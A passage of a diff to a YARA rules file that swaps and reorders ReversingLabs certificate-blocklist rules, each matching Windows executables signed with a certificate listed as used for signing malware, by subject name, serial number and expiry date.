-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sivi Technology Limited" and pe.signatures [ i ] . serial == "21:22:06:46:c6:39:d6:2c:16:99:2f:46" and 1466130984 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aarav Consulting Inc." and pe.signatures [ i ] . serial == "0f:1a:e2:23:9b:b9:6c:5a:ef:49:d0:ae:50:26:69:12" and 1653004800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9fa41321-9736-5e67-b561-005b6d893e3f"
+		id = "ef29c813-e914-5766-990f-76c14d18ec79"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16618-L16634"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10734-L10750"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "518a22e31432ee42e6aceb861815f7f9e84f2430b7fb3a78b498e45c584584ab"
+		logic_hash = "67c3d3496caf54ca0b1afc4d1dcc902e2f3632ac6708f85e163d427b567d098f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29165,21 +51559,21 @@ rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GIN-Konsalt" and pe.signatures [ i ] . serial == "73:86:63:f2:c9:e4:ad:b3:ad:53:06:aa:5e:7c:c5:48" and 1498435200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures [ i ] . serial == "1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" and 1645401600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "559dc522-bc23-5716-b8ad-9e9df102936b"
+		id = "51c596cd-3033-51ef-914f-310d2bbfbd5f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16636-L16652"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10752-L10768"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4cc8f00a9704f595f3e48375942a19cd6f8d6c0e53afc932a61f5a4326be4bcb"
+		logic_hash = "dec9d43c6911deb5f35c45692bfd6ef47f85d955f5e59041e58a1f0d2fc306e3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29189,21 +51583,21 @@ rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "42:80:f2:c8:ce:1d:98:e5:f8:da:7e:cb:00:5e:ea:e5" and 1476316800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures [ i ] . serial == "5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" and 1656028800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "46bc3ade-544c-5ee1-8d5d-4b8a269120c9"
+		id = "bb58ae8d-ef28-5644-abe8-2d4d8c892e95"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16654-L16670"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10770-L10786"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b7b4925482fcc47dea81eb3d84af31cc572f1b19080b98dda330b0bf6d7c80f4"
+		logic_hash = "0ff773d252e5e0402171ae15d7ab43bcfd313eb8c326ed5f128a89ec43386a52"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29213,21 +51607,21 @@ rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "29:46:39:7b:e9:c5:ae:44:e9:5c:99:af" and 1476092708 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures [ i ] . serial == "58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" and 1654819200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c3a18989-239e-56d7-b1c2-92895c02b7d8"
+		id = "eb06576e-11ea-58ba-aa19-68c161f6aa68"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16672-L16688"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10788-L10804"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b0c82388fd87a89841d190ce4020cc5a2ea21c9d765ceca6bc25d64162479231"
+		logic_hash = "174fe170c26a8197486e7b390d9fce4da61fb68ee5dc9486d43dbeb3cf659c3a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29237,21 +51631,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Yunhuitianxia Technology Co.,Ltd." and pe.signatures [ i ] . serial == "2d:f4:53:58:81:77:cf:1c:0c:29:7f:f4" and 1479735173 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" and 1648684800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ae3ef9cf-4b67-5cb8-9c9b-3edb95da222c"
+		id = "9158c9a5-37fc-54bc-9601-3aa347a421ab"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16690-L16706"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10806-L10822"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "75e3dfd593d7fdc268de54430be617c015957a624f2ca36bc0036d4cbde5b686"
+		logic_hash = "3d4b5e56962d04bc35451eeab4c1870c8653c9afcbb28dc6bad7cfb1711e9df1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29261,21 +51655,21 @@ rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "06:19:c5:e3:9a:4f:c6:0a:32:f9:b0:7f:6a:4c:a3:28" and 1475884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures [ i ] . serial == "12:df:5f:f3:46:09:79:ce:c1:28:8d:87:4a:9f:bf:83" and 1599091200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6a29551f-8359-5394-9acd-00c3b25d7064"
+		id = "1e76a088-b0f2-54d6-b730-77552c74d7bd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16708-L16724"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10824-L10842"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "30a079b55b75b292f7af4f5ae99184cbb3cca1ce4cf20f2f5c961b533673db00"
+		logic_hash = "cde89ae5b77ff6833fe642bdd74e81763ef068e31c07e7881906e4e4a5939942"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29285,21 +51679,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A&D DOMUS LIMITED" and pe.signatures [ i ] . serial == "2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" and 1554681600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and ( pe.signatures [ i ] . serial == "00:df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" or pe.signatures [ i ] . serial == "df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" ) and 1657756800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bd032608-8622-5c7a-a3a7-808d73e611d7"
+		id = "8f1d125a-de0f-525b-8dac-702bc123cc53"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16726-L16742"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10844-L10860"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e434a02f5b9b22a25d8fe7a0bb7bd81b1cd8bc5356b4b626e3bfceb3f554a085"
+		logic_hash = "0bd973f415b7cfa0858c705c4486da9f181c7259af01d1cff486fb6b8e8e775b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29309,21 +51703,21 @@ rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "34:ec:95:65:80:5f:34:20:4c:69:66:fb:81:e3:6b:a1" and 1476921600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "28:b6:91:27:27:19:b1:ee" and 1616410532 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "19930e7b-09cb-5c04-b838-3d8d73ba194b"
+		id = "8805805d-312d-5bd4-94da-c18270ac26bf"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16744-L16762"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10862-L10878"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "37b254ab76d144c09cc7b622dba59f5e372bf01ae12ce260a06143abb52062f6"
+		logic_hash = "6b3b2708d3a442fa6425e60ae900c94fc22fbfdb47f290ff56e9d349d99fd85f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29333,21 +51727,21 @@ rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MS CORP SOFTWARE LTD" and ( pe.signatures [ i ] . serial == "00:b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" or pe.signatures [ i ] . serial == "b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" ) and 1590710400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "M-Trans Maciej Caban" and pe.signatures [ i ] . serial == "1c:89:72:16:e5:8e:83:cb:e7:4a:d0:32:84:e1:fb:82" and 1639119705 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6bdba43f-4003-5807-9adc-20691fbc8d14"
+		id = "49e36ae5-25f0-5e1d-82f0-c7ada2b4d914"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16764-L16780"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10880-L10896"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ca43c7bacd8cb5a896c3135abf4a131bdb4a7f5093e64c8d1df743fad0c1c64a"
+		logic_hash = "fe3a2b906debb3f03e6a403829fca02c751754e9a02442a962c66defb84aed83"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29357,21 +51751,21 @@ rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Zhang" and pe.signatures [ i ] . serial == "3a:1b:39:7f:d9:45:1e:3b:58:91:fc:69:68:1e:d7:3d" and 1470614400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Board Game Bucket Ltd" and pe.signatures [ i ] . serial == "5a:36:4c:49:57:d9:34:06:f7:63:21:c2:31:6f:42:f0" and 1661337307 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d2e66765-bdf6-59ff-ac6c-1a82ecefa731"
+		id = "8984ac03-2646-54a1-a6d3-4c2cc72806e7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16782-L16798"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10898-L10916"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4e22568612aec050c7f78b81ba6749528a9c25c0ba43e14260a581a9bea7a2f0"
+		logic_hash = "940f6508208998593f309ffeeeda20ab475d427c952a14871b6e58e17d2a4c85"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29381,21 +51775,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x96\\x84\\xE5\\x90\\x9B \\xE9\\x9F\\xA6" and pe.signatures [ i ] . serial == "1e:b8:16:aa:49:e4:89:4d:9e:9f:78:72:9e:53:cd:48" and 1429056000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C\\xC3\\x94NG TY TNHH PDF SOFTWARE" and ( pe.signatures [ i ] . serial == "00:e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" or pe.signatures [ i ] . serial == "e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" ) and 1661558399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "46166e9e-515d-530a-a651-59821d979f01"
+		id = "784c58d9-9a13-5402-867e-c1b144512957"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16800-L16816"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10918-L10934"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ce41d046a7ca320d034fa226b5e8c22022cc6bfc97eb9ef294b1aca232aaacef"
+		logic_hash = "4edc263b08b21428b5f2f4f14f9582c0f96f79cb49fbba563c103bf8bb2037a6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29405,21 +51799,21 @@ rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "38:3c:a8:8d:6d:93:79:c7:40:60:95:60" and 1478250214 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "*.eos.com" and pe.signatures [ i ] . serial == "06:2b:28:27:50:0c:5d:f3:5a:83:f6:61:b3:af:5d:d3" and 1651449600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "df2423da-37ec-5adc-8497-2ac975b0b7ff"
+		id = "a3e6923a-f2c4-5d7c-aeab-bdb7fe03c597"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16818-L16834"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10936-L10952"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c05349166919ffc18ac6ecb61b822a8365f87a82164c5e110ef94345bdc4de6f"
+		logic_hash = "94d8739761b6a8ee91550be47432b046609b076aab6e57996de123a0fcaba73e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29429,21 +51823,21 @@ rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "67:31:cb:14:30:f1:8b:8c:0c:43:ab:40:e1:15:41:69" and 1436313600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Game Warriors Limited" and pe.signatures [ i ] . serial == "7b:f2:76:95:fd:20:b5:88:f2:b2:f1:73:b6:ca:f2:ba" and 1662112800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3d078c5d-e469-54f1-bd69-aebeec1c25f1"
+		id = "4ad05207-10d1-53c5-8383-a3c71a447ed6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16836-L16852"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10954-L10970"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d6d0d5c86dd88afa29fb3c7cc3c0ab2e3401637a23e062ee9bab693a715cf16f"
+		logic_hash = "2c063d0878a8bf6cd637e1dac2cb9164beb52c951e01858a7c3c9c4c1a853f54"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29453,21 +51847,21 @@ rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shan Feng" and pe.signatures [ i ] . serial == "15:95:05:e6:45:6b:9a:93:52:f7:c4:71:68:d8:9b:96" and 1469404800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Robin Limited" and pe.signatures [ i ] . serial == "1b:24:8c:85:08:04:2d:36:bb:d5:d9:2d:18:9c:61:d8" and 1663171218 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c6ba359e-4883-534d-bc86-8c063e54c92f"
+		id = "29cb9255-0a34-58e8-88b2-fad988c7d229"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16854-L16870"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10972-L10988"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ff2a2d06c48bd3426fa42526d966152e3e7166c4170b4e08bb65ee5d876eda93"
+		logic_hash = "8d1435d2fa70db12cde2f9098e35ca1737f5aac36bac91329b28f03aad090e90"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
